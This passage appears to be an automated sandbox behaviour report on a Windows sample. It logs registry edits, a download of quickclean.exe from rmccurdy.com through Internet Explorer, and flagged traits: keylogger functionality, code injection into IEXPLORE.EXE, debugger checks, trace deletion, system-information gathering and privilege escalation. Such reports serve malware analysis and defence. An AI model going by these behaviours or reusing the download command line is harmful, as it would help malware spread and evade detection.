old value "SavedLegacySettings=460000002C030000010000003B000000687474703D3132372E302E302E313A383038303B6674703D3132372E302E302E313A383038303B736F636B733D3132372E302E302E313A3830383000000000000000000000000000000000C02E43C5DC71CC0100000000000000000000000001000000020000000A00020F0000000000000000010000000500000088D01A0058E31B000000000010010000FFFFFFFF000000000C00000000000000010000000000000000000000000000000000000003A8020000000000C000000000000046409D05229E7ECF11AE5A00AA00A7112B770069006E0064006F0077007300000000000000"
* Creates value "(Default)=31" in key HKEY_CURRENT_USER\software\SandboxAutoExec
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox
[ Network services ]
* Looks for an Internet connection.
* Queries DNS "rmccurdy.com".
* C:\Program Files\Internet Explorer\IEXPLORE.EXE Connects to "54.212.205.151" on port 80 (TCP - HTTP).
* Downloads file from "rmccurdy.com/scripts/quickclean.exe".
[ Process/window/string information ]
* Keylogger functionality.
* Gets user name information.
* Gets input locale identifiers.
* Gets volume information.
* Gets computer name.
* Checks for debuggers.
* Deletes activity traces.
* Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
* Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
* Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
* Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
* Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
* Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-436374069-1343024091-1708537768-500MUTEX.DefaultS-1-5-21-436374069-1343024091-1708537768-500".
* Creates an event named "SBIE_BOXED_ServiceInitComplete_RpcSs".
* Creates process "c:\Program Files\Internet Explorer\iexplore.exe, "c:\Program Files\Internet Explorer\iexplore.exe" rmccurdy.com/scripts/quickclean.exe, C:\Program Files\Sandboxie".
* Injects code into process "C:\Program Files\Internet Explorer\IEXPLORE.EXE".
* Creates a mutex "Local\_!MSFTHISTORY!_".
* Creates a mutex "Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!".
* Creates a mutex "Local\c:!documents and settings!administrator!cookies!".
* Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!".
* Creates a mutex "Local\!IETld!Mutex".
* Creates a mutex "Local\!BrowserEmulation!SharedMemory!Mutex".
* Creates an event named "Isolation Signal Registry Event (8F78DBEB-B68E-11E3-AF35-0800271871C1, 0)".
* Creates a mutex "RasPbFile".
* Lists all entry names in a remote access phone book.
* Opens a service named "RASMAN".
* Opens a service named "Sens".
* Creates a mutex "ConnHashTable<2396>_HashTable_Mutex".
* Creates a mutex "Local\ZoneAttributeCacheCounterMutex".
* Creates a mutex "Local\ZonesCacheCounterMutex".
* Creates a mutex "Local\ZonesLockedCacheCounterMutex".
* Enables privilege SeLoadDriverPrivilege.
* Enables privilege SeUndockPrivilege.
* Creates a mutex "Local\ZonesCounterMutex".
* Creates process "null, "C:\Program Files\Internet Explorer\IEXPLORE.EXE" SCODEF:2396 CREDAT:14337, C:\Documents and Settings\Administrator\Desktop".
* Creates an event named "Isolation Signal Registry Event (8F78DBEF-B68E-11E3-AF35-0800271871C1, 0)".
* Creates a mutex "MSCTF.Shared.MUTEX.ANH".
* Creates a mutex "Local\c:!documents and settings!administrator!local settings!application data!microsoft!feeds cache!".
* Creates an event named "IEFrame.EventCheckDefaultBrowser".
* Creates an event named "Local\e5c_29".
* Creates a mutex "CritOpMutex".
* Opens a service named "LanmanServer".
* Creates a mutex "MSCTF.Shared.MUTEX.EHK".
* Creates an event named "MSCTF.SendReceive.Event.EHK.IC".
* Creates an event named "MSCTF.SendReceiveConection.Event.EHK.IC".
* Creates an event named "ShellCopyEngineRunning".
* Creates an event named "ShellCopyEngineFinished".
* Creates a mutex "_!SHMSFTHISTORY!_".
* Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014031720140318!".
* Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014031720140324!".
* Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014031820140319!".
* Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014032120140322!".
* Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014032820140329!".
* Opens a service named "AudioSrv".
* Creates a mutex "MidiMapper_modLongMessage_RefCnt".
* Creates a mutex "MidiMapper_Configure".
* Enables process privileges.
* Sleeps 1244 seconds.